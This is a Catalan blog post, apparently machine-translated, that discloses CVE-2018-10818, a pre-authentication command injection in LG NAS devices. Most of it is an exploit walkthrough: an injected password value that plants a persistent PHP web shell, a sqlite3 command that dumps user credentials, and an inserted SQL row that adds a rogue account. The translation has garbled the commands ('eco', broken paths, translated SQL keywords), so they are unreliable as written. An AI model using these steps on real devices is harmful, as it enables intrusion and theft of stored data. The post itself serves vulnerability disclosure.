Vulnerabilitat crítica que es troba a la majoria dels dispositius LG NAS

Visió general:

Hem fet una avaluació completa en un dispositiu LG NAS. Aquest dispositiu és un dispositiu d’emmagatzematge connectat a una xarxa que només permet als usuaris autoritzats. És com un núvol privat, només costa menys, és senzill d’operar i et permet un control complet. malgrat això, hem trobat una manera de piratejar al sistema mitjançant una vulnerabilitat d’injecció de comandaments remots preautentificats (CVE-2018-10818), que ens pot permetre fer pràcticament tot, inclòs l’accés a les dades i la manipulació de les dades i contingut de l’usuari.. 

Explotació:

La vulnerabilitat (CVE-2018-10818) és una vulnerabilitat d’injecció de comandaments remots preautor que es troba a la majoria de dispositius LG NAS.

Tal com es mostra al vídeo, no es pot simplement iniciar la sessió amb cap nom d’usuari i contrasenya aleatoris. No obstant això, hi ha una vulnerabilitat d’injecció d’ordres en el paràmetre “contrasenya” (heu d’utilitzar un interceptor com burp). Simplement podem activar aquest error afegint-lo. Per afegir un nou usuari, simplement podem escriure un shell persistent anomenat c.php mitjançant:
; eco “” > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Si s’introdueix com a contrasenya s’explota la vulnerabilitat.

A continuació, passant la següent comanda, podrem “bolcar” els usuaris:
eco “usuari .dump” | sqlite3 /etc/nas/db/share.db
El fet de volar significa llegir totes les dades de la base de dades. Donem la base de dades de manera que puguem veure els noms d’usuari i les contrasenyes dels usuaris. Això també ens permet afegir el nostre.

Per afegir un nou usuari a la base de dades, hem de generar un MD5 vàlid. Podem utilitzar l’eina MD5 inclosa per crear un hash amb el nom d’usuari “test” i la contrasenya “1234”.
sudo nas-common md5 1234
Un cop tinguem una contrasenya i un nom d’usuari vàlids, la podem afegir a la base de dades amb el següent:
INSERTAR EN ELS VALORS “d’usuari” (“prova”, “md5_hash”, “Test Vuln”, “test @ localhost”, “”);
Un cop finalitzat, podem iniciar la sessió a l’emmagatzematge de xarxa LG amb el nom d’usuari i la contrasenya 1234.

Això ens dóna accés al sistema com a usuari autoritzat. Des d’aquí podem accedir a totes les dades o fitxers classificats que es desen al dispositiu LAS.

Recomanacions:

  • Tingueu en compte que els dispositius LAS es poden piratejar i explotar.
  • Poseu-vos en contacte amb LG per informar-los sobre aquesta vulnerabilitat i exigiu-los que ho solucionin.
  • Avisa als teus amics a Facebook (aquí hi ha un enllaç) o a twitter (fes clic per tuitejar)
Kim Martin
Kim Martin Administrator
Sorry! The Author has not filled his profile.
follow me